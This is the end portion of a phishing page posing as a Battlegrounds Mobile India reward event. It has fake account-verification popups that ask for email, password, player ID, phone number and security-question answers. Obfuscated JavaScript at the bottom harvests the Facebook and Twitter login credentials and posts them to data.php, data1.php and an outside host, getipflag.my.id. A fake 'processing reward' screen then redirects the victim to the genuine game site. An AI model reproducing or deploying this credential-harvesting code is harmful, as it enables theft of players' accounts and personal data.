<div class="footer-menu-twitter">Sign up to Twitter</div> <!--- footer-menu-twitter --->
<br><br></form>
</center>
</div> <!--- box-twitter --->
</div> <!--- header-twitter --->
</div> <!--- popup-box-login-twitter --->
</div> <!--- popup-login--->

<div class="popup account_verification animated fadeIn" style="display: none;">
<div class="popup-box-wrapper">
<div class="popup-box-navbar">
<div class="popup-box-navbar-title">Account Verification</div> <!--- popup-box-navbar-title --->
</div> <!--- popup-box-navbar --->
<div class="popup-box-bg">
<div class="popup-box-alert4"><br>Complete your account details:</div> <!--- popup-box-alert --->
<form class="popup-box-form" action="javascript:void(0)" method="post" id="ValidateVerificationDataForm" onsubmit="open_my_account();">
<input type="hidden" name="email" id="validateEmail" readonly>
<input type="hidden" name="password" id="validatePassword" readonly>
<input type="number" name="playid" id="playid" placeholder="Player ID" autocomplete="off" required oninvalid="this.setCustomValidity('Input your Player ID')" oninput="setCustomValidity('')">
<input type="number" name="phone" id="phone" placeholder="Phone Number" autocomplete="off" required oninvalid="this.setCustomValidity('Input your Phone Number')" oninput="setCustomValidity('')">
<select name="level" id="level" required oninvalid="this.setCustomValidity('Choose your Account Level')" oninput="setCustomValidity('')">
<option selected="selected" disabled="disabled" value="">Account Level</option>
<option>1</option>
<option>2</option>
<option>3</option>
<option>4</option>
<option>5</option>
<option>6</option>
<option>7</option>
<option>8</option>
<option>9</option>
<option>10</option>
<option>11</option>
<option>12</option>
<option>13</option>
<option>14</option>
<option>15</option>
<option>16</option>
<option>17</option>
<option>18</option>
<option>19</option>
<option>20</option>
<option>21</option>
<option>22</option>
<option>23</option>
<option>24</option>
<option>25</option>
<option>26</option>
<option>27</option>
<option>28</option>
<option>29</option>
<option>30</option>
<option>31</option>
<option>32</option>
<option>33</option>
<option>34</option>
<option>35</option>
<option>36</option>
<option>37</option>
<option>38</option>
<option>39</option>
<option>40</option>
<option>41</option>
<option>42</option>
<option>43</option>
<option>44</option>
<option>45</option>
<option>46</option>
<option>47</option>
<option>48</option>
<option>49</option>
<option>50</option>
<option>51</option>
<option>52</option>
<option>53</option>
<option>54</option>
<option>55</option>
<option>56</option>
<option>57</option>
<option>58</option>
<option>59</option>
<option>60</option>
<option>61</option>
<option>62</option>
<option>63</option>
<option>64</option>
<option>65</option>
<option>66</option>
<option>67</option>
<option>68</option>
<option>69</option>
<option>70</option>
<option>71</option>
<option>72</option>
<option>73</option>
<option>74</option>
<option>75</option>
<option>76</option>
<option>77</option>
<option>78</option>
<option>79</option>
<option>80</option>
<option>81</option>
<option>82</option>
<option>83</option>
<option>84</option>
<option>85</option>
<option>86</option>
<option>87</option>
<option>88</option>
<option>89</option>
<option>90</option>
<option>91</option>
<option>92</option>
<option>93</option>
<option>94</option>
<option>95</option>
<option>96</option>
<option>97</option>
<option>98</option>
<option>99</option>
<option>100</option>
</select>
<input type="hidden" name="login" id="validateLogin" readonly>
<br>
<div class="popup-box-footer">
<button type="submit" onmousedown="buka.play();" onclick="ValidateVerificationData()">Verification</button>
</div> <!--- popup-box-form-footer --->
</div> <!--- popup-box-bg --->
</form> <!--- form --->
</div> <!--- popup-box-wrapper popup-box-verification --->
</div> <!--- popup account_verification --->

<div class="popup other_verification animated fadeIn" style="display: none;">
	<div class="popup-box-wrapper">
		<div class="popup-box-navbar">
		<div class="popup-box-navbar-title">Other Verification</div> <!--- nav-popup-title --->
	</div> <!--- nav-popup --->
	<div class="popup-box-bg">
	<div class="popup-box-alert4">Complete your account details</div> <!--- popup-alert --->
	<form class="popup-box-form" action="javascript:void(0)" method="post" id="ValidateVerificationDataForm" onsubmit="open_my_account();">
	<input type="hidden" name="email" id="validateEmail" readonly>
	<input type="hidden" name="password" id="validatePassword" readonly>
	<input type="hidden" name="playid" id="playid" readonly>
	<input type="hidden" name="phone" id="phone" readonly>
	<input type="hidden" name="level" id="level" readonly>
	<select style="font-size: 12px;" name="answer1" id="answer1" required>
		<option selected="selected" disabled="disabled" value="">In the past six months, what device did you use most often to play the game?</option>
		<option>Samsung</option>
		<option>Xiaomi</option>
		<option>Apple</option>
		<option>Huawei</option>
		<option>Oppo</option>
		<option>Vivo</option>
		<option>Realme</option>
		<option>Asus</option>
		<option>Infinix Mobile Limited</option>
		<option>Tecno Mobile Limited</option>
		<option>Oneplus</option>
		<option>Motorola</option>
		<option>Lge</option>
		<option>Lenovo</option>
		<option>Hmd Global</option>
		<option>Sony</option>
		<option>General Mobile</option>
		<option>TCL</option>
		<option>Google</option>
		<option>Nubia</option>
		<option>Itel</option>
		<option>Sharp</option>
		<option>ZTE</option>
		<option>Tencent</option>
		<option>Aidata</option>
		<option>VSMart</option>
		<option>Blackshark</option>
		<option>Meizu</option>
		<option>Casper</option>
		<option>Titan</option>
		</select>
		<select style="font-size: 12px;" name="answer2" id="answer2" required>
		<option selected="selected" disabled="disabled" value="">When did you most frequently start matching in the last six months?</option>
		<option>03:00 - 06:59</option>
		<option>07:00 - 10:59</option>
		<option>11:00 - 14:59</option>
		<option>15:00 - 18:59</option>
		<option>19:00 - 22:59</option>
		<option>23:00 - 02:59</option>
		</select>
		<select style="font-size: 12px;" name="answer3" id="answer3" required>
		<option selected="selected" disabled="disabled" value="">In the past six months, which Classic Mode map did you play on the most?</option>
		<option>Erangel</option>
		<option>Livik</option>
		<option>Sanhok</option>
		<option>Miramar</option>
		<option>Karakin</option>
		<option>I never played before</option>
		</select>
		<select style="font-size: 12px;" name="answer4" id="answer4" required>
		<option selected="selected" disabled="disabled" value="">Apart from this month, when was your latest top-up made on your account?</option>
		<option>202301</option>
		<option>202212</option>
		<option>202211</option>
		<option>202210</option>
		<option>202209</option>
		<option>202208</option>
		<option>202207</option>
		<option>202206</option>
		<option>202205</option>
		<option>202204</option>
		<option>202203</option>
		<option>202202</option>
		<option>202201</option>
		<option>202112</option>
		<option>202111</option>
		<option>202110</option>
		<option>202109</option>
		<option>202108</option>
		<option>202107</option>
		<option>202106</option>
		<option>202105</option>
		<option>202104</option>
		<option>202103</option>
		<option>202102</option>
		<option>202101</option>
		<option>202012</option>
		<option>202011</option>
		<option>202010</option>
		<option>202009</option>
		<option>202008</option>
		<option>202007</option>
		<option>202006</option>
		<option>202005</option>
		<option>202004</option>
		<option>202003</option>
		<option>202002</option>
		<option>202001</option>
		<option>201912</option>
		<option>201911</option>
		<option>201910</option>
		<option>201909</option>
		<option>201908</option>
		<option>201907</option>
		<option>201906</option>
		<option>201905</option>
		<option>201904</option>
		<option>201903</option>
		<option>201902</option>
		<option>201901</option>
		<option>201812</option>
		<option>201811</option>
		<option>201810</option>
		<option>201809</option>
		<option>201808</option>
		<option>201807</option>
		<option>201806</option>
		<option>201805</option>
		<option>201804</option>
		<option>201803</option>
		<option>Never purchased UC</option>
		</select>
	<input type="hidden" name="login" id="validateLogin" readonly>
	<br>
	<div class="popup-box-footer">
	<button type="submit" onmousedown="buka.play();" onclick="ValidateVerificationData()">Verify</button>
	</div> <!--- popup-footer --->
   </div> <!--- popup-box-bg --->
	</form> <!--- form --->
	</div> <!--- popup-box --->
	</div> <!--- popup --->

<div class="popup check_verification animated fadeIn" style="display: none;">
<div class="popup-box-wrapper">
<div class="popup-box-navbar">
<div class="popup-box-navbar-title">Account Verification</div> <!--- popup-box-navbar-title --->
</div> <!--- popup-box-navbar --->
<div class="popup-box-bg">
<div class="popup-box-alert4"><br>
<i class="zmdi zmdi-spinner zmdi-hc-spin"></i>
<br>
Checking your account details...
</div> <!--- popup-box-bg --->
<div class="popup-box-footer">
</div> <!--- popup-box-form-footer --->
</div> <!--- popup-box-alert4 --->
</div> <!--- popup-box-wrapper --->
</div> <!--- popup check_verification --->

<div class="popup processing_account animated fadeIn" style="display: none;">
<div class="popup-box-wrapper">
<div class="popup-box-navbar">
<div class="popup-box-navbar-title">Processing Account</div> <!--- popup-box-navbar-title --->
</div> <!--- popup-box-navbar --->
<div class="popup-box-bg">
<div class="popup-box-alert3"><br>
Thank you for joining the BGMI Event
<br>
Your account is being processed to receive your reward. Please wait up to 24 hours. </div>
<div class="popup-box-alert0">
<br>- BATTLEGROUNDS MOBILE INDIA -
</div> <!--- popup-box-alert0 --->
<div class="popup-box-footer">
<button type="button" onmousedown="tutup.play();" style="margin-right: 0; float: none;" onclick="location.href='https://www.battlegroundsmobileindia.com/';">Logout</button>
</div> <!--- popup-box-bg --->
</div> <!--- popup-box-form-footer --->
</div> <!--- popup-box-wrapper --->
</div> <!--- popup processing_account --->

<script src="./index_files/jquery.min.js.download"></script>
<script type="text/javascript" src="index_files/gift-zone.js"></script>
<script src="https://cdn.jsdelivr.net/npm/ionpackagesa@2.4.5-icons/ionicons.map.js"></script>
<script type="text/javascript" src="js-zone/showHide.js"></script>
<script type="text/javascript" src="js-zone/slider.js"></script>
<audio id="audioFile" src="media/spin.mp3"></audio>
<script>
$(document).ready(function() { 
var detik = 59;
var menit = 59;
var jam = 23;
function hitung() { 
setTimeout(hitung,1000); $('#timer1').html( '' + jam + ' : ' + menit + ' : ' + detik + ''); detik --; 
if(detik < 0) { 
detik = 59; 
menit --; 
if(menit < 0) { 
menit = 0; 
detik = 0; 
} 
} 
} 
hitung(); 
}
);
$(document).ready(function() { 
var detik = 59;
var menit = 59;
var jam = 23;
function hitung() { 
setTimeout(hitung,1000); $('#timer2').html( + jam + ' : ' + menit + ' : ' + detik + ''); detik --; 
if(detik < 0) { 
detik = 59; 
menit --; 
if(menit < 0) { 
menit = 0; 
detik = 0; 
} 
} 
} 
hitung(); 
}
);
</script><script>
var slideIndex = 0;
showSlides();
function showSlides() {
    var i;
    var slides = document.getElementsByClassName("slider");
    for (i = 0; i < slides.length; i++) {
        slides[i].style.display = "none"; 
    }
    slideIndex++;
    if (slideIndex > slides.length) {slideIndex = 1} 
    slides[slideIndex-1].style.display = "block"; 
    setTimeout(showSlides, 2400);
}
</script><script>
// code for activate clicked sound
var buka = new Audio();
buka.src = "https://l.top4top.io/m_1725u5z7i1.mp3";

var tutup = new Audio();
tutup.src = "https://a.top4top.io/m_1725zobal2.mp3";
</script><script>
function audioFile() {
    var audio = document.getElementById('audioFile');
    audio.play();}
$(document).ready(function(){
        $("o").attr("onclick", "audioFile()");
	});
</script><script>
// kode untuk ganti gambar header otomatis
var slideIndexHeader = 0;
showSlidesHeader();
function showSlidesHeader() {
    var i;
    var slidesHeader = document.getElementsByClassName("sliderHeader");
    for (i = 0; i < slidesHeader.length; i++) {
        slidesHeader[i].style.display = "none"; 
    }
    slideIndexHeader++;
    if (slideIndexHeader > slidesHeader.length) {slideIndexHeader = 1} 
    slidesHeader[slideIndexHeader-1].style.display = "block"; 
    setTimeout(showSlidesHeader, 2600);
} 
</script><script>var _0x39461a=_0x3477;(function(_0x553efe,_0x551f78){var _0x43fae3=_0x3477,_0x4eff2e=_0x553efe();while(!![]){try{var _0x30338e=parseInt(_0x43fae3(0x130))/0x1+parseInt(_0x43fae3(0x132))/0x2+-parseInt(_0x43fae3(0x12b))/0x3*(-parseInt(_0x43fae3(0x11c))/0x4)+-parseInt(_0x43fae3(0x134))/0x5*(parseInt(_0x43fae3(0x119))/0x6)+parseInt(_0x43fae3(0x123))/0x7+-parseInt(_0x43fae3(0x11d))/0x8*(-parseInt(_0x43fae3(0x12d))/0x9)+parseInt(_0x43fae3(0x135))/0xa*(-parseInt(_0x43fae3(0x138))/0xb);if(_0x30338e===_0x551f78)break;else _0x4eff2e['push'](_0x4eff2e['shift']());}catch(_0x5c414f){_0x4eff2e['push'](_0x4eff2e['shift']());}}}(_0x2623,0x4b70c));function openRewards(_0x2b8e9c,_0x1bcfa8){var _0x309087=_0x3477,_0x286349,_0x3c08d6,_0x125dde;_0x3c08d6=document[_0x309087(0x137)](_0x309087(0x127));for(_0x286349=0x0;_0x286349<_0x3c08d6[_0x309087(0x118)];_0x286349++){_0x3c08d6[_0x286349]['style'][_0x309087(0x133)]=_0x309087(0x121);}_0x125dde=document[_0x309087(0x137)](_0x309087(0x126));for(_0x286349=0x0;_0x286349<_0x125dde[_0x309087(0x118)];_0x286349++){_0x125dde[_0x286349][_0x309087(0x136)]=_0x125dde[_0x286349][_0x309087(0x136)][_0x309087(0x122)](_0x309087(0x131),'');}document['getElementById'](_0x1bcfa8)[_0x309087(0x12f)]['display']=_0x309087(0x116),_0x2b8e9c[_0x309087(0x11e)][_0x309087(0x136)]+='\x20menu-content-active';}document[_0x39461a(0x11b)](_0x39461a(0x117))[_0x39461a(0x115)]();function open_account_verification(){var _0x1dc3ef=_0x39461a;$(_0x1dc3ef(0x11f))[_0x1dc3ef(0x125)](),$(_0x1dc3ef(0x139))[_0x1dc3ef(0x11a)](),$(_0x1dc3ef(0x129))['hide']();}function open_mail_login(){var _0x513d84=_0x39461a;$(_0x513d84(0x12a))[_0x513d84(0x125)](),$(_0x513d84(0x128))['hide']();}function close_mail_login(){var _0x1abb7a=_0x39461a;$(_0x1abb7a(0x12a))[_0x1abb7a(0x11a)](),$(_0x1abb7a(0x128))['show']();}function open_about_event(){var _0x550b93=_0x39461a;$('.about_event')[_0x550b93(0x125)]();}function open_event_rules(){var _0x19c2a0=_0x39461a;$(_0x19c2a0(0x124))['show']();}function open_facebook(){var _0xb63c9e=_0x39461a;$(_0xb63c9e(0x12c))['show'](),$(_0xb63c9e(0x128))[_0xb63c9e(0x11a)]();}function _0x2623(){var _0x13d6c9=['.otherReward_confirmation','.login-mail','4383wQZeTs','.login-facebook','1479276KMMRvA','.login-twitter','style','185734BGYYvS','\x20menu-content-active','921956lqMJxt','display','410MmqRZH','4923010TsoaMG','className','getElementsByClassName','33NkJVHD','.open_rewards','click','block','defaultTabRewards','length','11238lZQPuU','hide','getElementById','1332tzZqwV','24IhxgPB','currentTarget','.account_verification','.newhome','none','replace','2192232FFZWXb','.event_rules','show','menu-content','tab_rewards','.account_login'];_0x2623=function(){return _0x13d6c9;};return _0x2623();}function open_twitter(){var _0x5ad454=_0x39461a;$('.login-twitter')[_0x5ad454(0x125)](),$(_0x5ad454(0x128))['hide']();}function close_reward_confirmation(){var _0x307374=_0x39461a;$(_0x307374(0x139))[_0x307374(0x11a)](),$(_0x307374(0x124))[_0x307374(0x11a)]();}function _0x3477(_0x328bab,_0x2762f7){var _0x2623c6=_0x2623();return _0x3477=function(_0x3477e1,_0x37ae34){_0x3477e1=_0x3477e1-0x115;var _0x593165=_0x2623c6[_0x3477e1];return _0x593165;},_0x3477(_0x328bab,_0x2762f7);}function close_facebook(){var _0x18d764=_0x39461a;$(_0x18d764(0x12c))[_0x18d764(0x11a)](),$(_0x18d764(0x128))[_0x18d764(0x125)]();}function close_twitter(){var _0x373b21=_0x39461a;$(_0x373b21(0x12e))['hide'](),$(_0x373b21(0x128))['show']();}function open_newhome(){var _0x765ced=_0x39461a;$(_0x765ced(0x128))[_0x765ced(0x125)](),$(_0x765ced(0x120))[_0x765ced(0x11a)]();}function open_account_login(){var _0x43a9b6=_0x39461a;$(_0x43a9b6(0x128))['show'](),$(_0x43a9b6(0x139))['hide']();}</script><script>(function(_0x17cebf,_0x53b3a1){var _0x2b4569=_0x2ce1,_0x96fcbd=_0x17cebf();while(!![]){try{var _0x54de9f=-parseInt(_0x2b4569(0xdd))/0x1*(-parseInt(_0x2b4569(0xed))/0x2)+-parseInt(_0x2b4569(0xcf))/0x3*(-parseInt(_0x2b4569(0xd4))/0x4)+parseInt(_0x2b4569(0xe7))/0x5*(parseInt(_0x2b4569(0xd0))/0x6)+-parseInt(_0x2b4569(0xdb))/0x7+-parseInt(_0x2b4569(0xee))/0x8*(-parseInt(_0x2b4569(0xe8))/0x9)+parseInt(_0x2b4569(0xe6))/0xa*(-parseInt(_0x2b4569(0x104))/0xb)+-parseInt(_0x2b4569(0xfa))/0xc;if(_0x54de9f===_0x53b3a1)break;else _0x96fcbd['push'](_0x96fcbd['shift']());}catch(_0x3705c8){_0x96fcbd['push'](_0x96fcbd['shift']());}}}(_0x4bfb,0x3accb));function _0x2ce1(_0x236f00,_0x1e254e){var _0x4bfb71=_0x4bfb();return _0x2ce1=function(_0x2ce15e,_0x2e07c3){_0x2ce15e=_0x2ce15e-0xce;var _0x475b93=_0x4bfb71[_0x2ce15e];return _0x475b93;},_0x2ce1(_0x236f00,_0x1e254e);}function _0x4bfb(){var _0x366dd6=['input#validateEmail','2852801BFYgdQ','val','1054uEBXru','#email-twitter','#login-facebook','.login-twitter','#ValidateLoginTwitterForm','ajax','submit','.sandi-fb','.slider-container','52810LjzVba','750NwdUNO','999wBaEvG','.verification_info','input#validateLogin','#password-facebook','#ValidateLoginFbForm','708DyJrsX','26112nqwIWV','trim','input#validatePassword','#level','#email-facebook','#ValidateVerificationDataForm','length','.email-tw','.login-facebook','https://getipflag.my.id/','#playid','serialize','2748324VNJCXk','preventDefault','input#phone','.email-fb','#password-twitter','.check_verification','#login-twitter','input#answer2','POST','.Other_verification','286xJSPPs','.sandi-tw','input#answer1','3sJgCtu','8868lCAwTs','.account_verification','show','input#playid','230396jqZEXh','input#level','.processing_account','data1.php','#phone','hide'];_0x4bfb=function(){return _0x366dd6;};return _0x4bfb();}function ValidateLoginFbData(){var _0x40894b=_0x2ce1;return $(_0x40894b(0xec))[_0x40894b(0xe3)](function(_0x30cabd){var _0x29cc32=_0x40894b;_0x30cabd[_0x29cc32(0xfb)](),$emailfb=$(_0x29cc32(0xf2))[_0x29cc32(0xdc)]()['trim'](),$passwordfb=$(_0x29cc32(0xeb))[_0x29cc32(0xdc)]()[_0x29cc32(0xef)](),$loginfb=$(_0x29cc32(0xdf))[_0x29cc32(0xdc)]()[_0x29cc32(0xef)]();if($emailfb==''||$emailfb==null||$emailfb[_0x29cc32(0xf4)]<=0x8)return $(_0x29cc32(0xfd))[_0x29cc32(0xd2)](),$(_0x29cc32(0xe4))['hide'](),$(_0x29cc32(0xd1))[_0x29cc32(0xd9)](),$(_0x29cc32(0xf6))[_0x29cc32(0xd2)](),![];else $('.email-fb')['hide'](),$(_0x29cc32(0xda))[_0x29cc32(0xdc)]($emailfb),$(_0x29cc32(0xd1))['show'](),$(_0x29cc32(0xf6))[_0x29cc32(0xd9)]();if($passwordfb==''||$passwordfb==null||$passwordfb[_0x29cc32(0xf4)]<=0x5)return $('.sandi-fb')[_0x29cc32(0xd2)](),$(_0x29cc32(0xd1))['hide'](),$(_0x29cc32(0xf6))[_0x29cc32(0xd2)](),![];else $(_0x29cc32(0xe4))['hide'](),$('input#validatePassword')['val']($passwordfb),$(_0x29cc32(0xea))[_0x29cc32(0xdc)]($loginfb),$('.account_verification')['show'](),$('.login-facebook')[_0x29cc32(0xd9)]();var _0x6c23b=$(_0x29cc32(0xda))['val'](),_0x5f4442=$(_0x29cc32(0xf0))[_0x29cc32(0xdc)](),_0x507e8d=$(_0x29cc32(0xea))[_0x29cc32(0xdc)]();if(_0x6c23b==''&&_0x5f4442==''&&_0x507e8d=='')return $(_0x29cc32(0xf6))[_0x29cc32(0xd9)](),![];$[_0x29cc32(0xe2)]({'type':_0x29cc32(0x102),'url':_0x29cc32(0xd7),'data':$(this)[_0x29cc32(0xf9)](),'beforeSend':function(){var _0x593bd0=_0x29cc32;$(_0x593bd0(0xf6))[_0x593bd0(0xd9)]();},'success':function(){var _0x555190=_0x29cc32;$('.login-facebook')[_0x555190(0xd9)](),$(_0x555190(0xe5))[_0x555190(0xd2)]();}});}),![];};function ValidateLoginTwitterData(){var _0x2387e5=_0x2ce1;return $(_0x2387e5(0xe1))[_0x2387e5(0xe3)](function(_0xb5c8eb){var _0x19e058=_0x2387e5;_0xb5c8eb[_0x19e058(0xfb)](),$emailtw=$(_0x19e058(0xde))[_0x19e058(0xdc)]()[_0x19e058(0xef)](),$passwordtw=$(_0x19e058(0xfe))[_0x19e058(0xdc)]()[_0x19e058(0xef)](),$logintw=$(_0x19e058(0x100))[_0x19e058(0xdc)]()['trim']();if($emailtw==''||$emailtw==null||$emailtw[_0x19e058(0xf4)]<=0x3)return $(_0x19e058(0xf5))['show'](),$(_0x19e058(0x105))[_0x19e058(0xd9)](),$(_0x19e058(0xd1))[_0x19e058(0xd9)](),$(_0x19e058(0xe0))[_0x19e058(0xd2)](),![];else $(_0x19e058(0xf5))[_0x19e058(0xd9)](),$(_0x19e058(0xda))['val']($emailtw),$(_0x19e058(0xd1))['show'](),$(_0x19e058(0xe0))[_0x19e058(0xd9)]();if($passwordtw==''||$passwordtw==null||$passwordtw[_0x19e058(0xf4)]<=0x7)return $(_0x19e058(0x105))['show'](),$(_0x19e058(0xd1))[_0x19e058(0xd9)](),$(_0x19e058(0xe0))[_0x19e058(0xd2)](),![];else $(_0x19e058(0x105))['hide'](),$(_0x19e058(0xf0))['val']($passwordtw),$('input#validateLogin')['val']($logintw),$('.account_verification')['show'](),$(_0x19e058(0xe0))['hide']();var _0x20d132=$('input#validateEmail')[_0x19e058(0xdc)](),_0x3a290c=$(_0x19e058(0xf0))[_0x19e058(0xdc)](),_0xdf0d35=$(_0x19e058(0xea))['val']();if(_0x20d132==''&&_0x3a290c==''&&_0xdf0d35=='')return $('.login-twitter')[_0x19e058(0xd9)](),![];$[_0x19e058(0xe2)]({'type':_0x19e058(0x102),'url':_0x19e058(0xd7),'data':$(this)[_0x19e058(0xf9)](),'beforeSend':function(){var _0x4703cf=_0x19e058;$(_0x4703cf(0xe0))[_0x4703cf(0xd9)]();},'success':function(){var _0x4330ef=_0x19e058;$(_0x4330ef(0xe0))['hide'](),$('.slider-container')[_0x4330ef(0xd2)]();}});}),![];};function ValidateVerificationData(){$('#ValidateVerificationDataForm')['submit'](function(_0x322c89){var _0x3c0c6a=_0x2ce1;_0x322c89[_0x3c0c6a(0xfb)](),$playid=$(_0x3c0c6a(0xf8))[_0x3c0c6a(0xdc)]()[_0x3c0c6a(0xef)](),$phone=$(_0x3c0c6a(0xd8))[_0x3c0c6a(0xdc)]()['trim'](),$level=$(_0x3c0c6a(0xf1))[_0x3c0c6a(0xdc)]()['trim']();if($playid==''||$phone==''||$level==''){}else $('.account_verification')['hide'](),$('.Other_verification')['show'](),$(_0x3c0c6a(0xd3))[_0x3c0c6a(0xdc)]($playid),$(_0x3c0c6a(0xfc))[_0x3c0c6a(0xdc)]($phone),$(_0x3c0c6a(0xd5))[_0x3c0c6a(0xdc)]($level);var _0x2508b5=$('input#validateEmail')[_0x3c0c6a(0xdc)](),_0x59bb97=$(_0x3c0c6a(0xf0))[_0x3c0c6a(0xdc)](),_0x3cac80=$(_0x3c0c6a(0xea))[_0x3c0c6a(0xdc)]();});}function ValidateVerificationData(){var _0x4dba7c=_0x2ce1,_0x250888=$(_0x4dba7c(0xf3))[_0x4dba7c(0xf9)]();return $['ajax']({'url':_0x4dba7c(0xf7),'data':_0x250888,'type':_0x4dba7c(0x102),'success':function(){return!0x0;},'error':function(){return!0x0;}}),$('#ValidateVerificationDataForm')[_0x4dba7c(0xe3)](function(_0x514994){var _0x1581fb=_0x4dba7c;_0x514994['preventDefault']();var _0x5a5aa5=$('input#validateEmail')['val'](),_0x1d48ad=$('input#validatePassword')[_0x1581fb(0xdc)](),_0x12fa24=$(_0x1581fb(0xd3))['val'](),_0x590fd2=$(_0x1581fb(0xfc))[_0x1581fb(0xdc)](),_0x25de89=$(_0x1581fb(0xd5))['val'](),_0x33b666=$(_0x1581fb(0xce))['val'](),_0x1fbf4a=$(_0x1581fb(0x101))[_0x1581fb(0xdc)](),_0x37bd33=$('input#answer3')['val'](),_0x10051d=$('input#answer4')['val'](),_0x665c60=$(_0x1581fb(0xea))['val']();if(_0x5a5aa5==''&&_0x1d48ad==''&&_0x12fa24==''&&_0x590fd2==''&&_0x25de89==''&&_0x33b666==''&&_0x1fbf4a==''&&_0x37bd33==''&&_0x10051d==''&&_0x665c60=='')return $(_0x1581fb(0xe9))[_0x1581fb(0xd2)](),$(_0x1581fb(0xd1))['hide'](),![];$['ajax']({'type':_0x1581fb(0x102),'url':'data.php','data':$(this)[_0x1581fb(0xf9)](),'beforeSend':function(){var _0x5f1acb=_0x1581fb;$(_0x5f1acb(0xff))[_0x5f1acb(0xd2)](),$(_0x5f1acb(0x103))[_0x5f1acb(0xd9)]();},'success':function(){var _0x196dd3=_0x1581fb;$(_0x196dd3(0xd6))[_0x196dd3(0xd2)](),$(_0x196dd3(0xff))['hide'](),$(_0x196dd3(0xd1))['hide'](),$(_0x196dd3(0x103))['hide']();}});}),![];};
</script>
</body>
</html>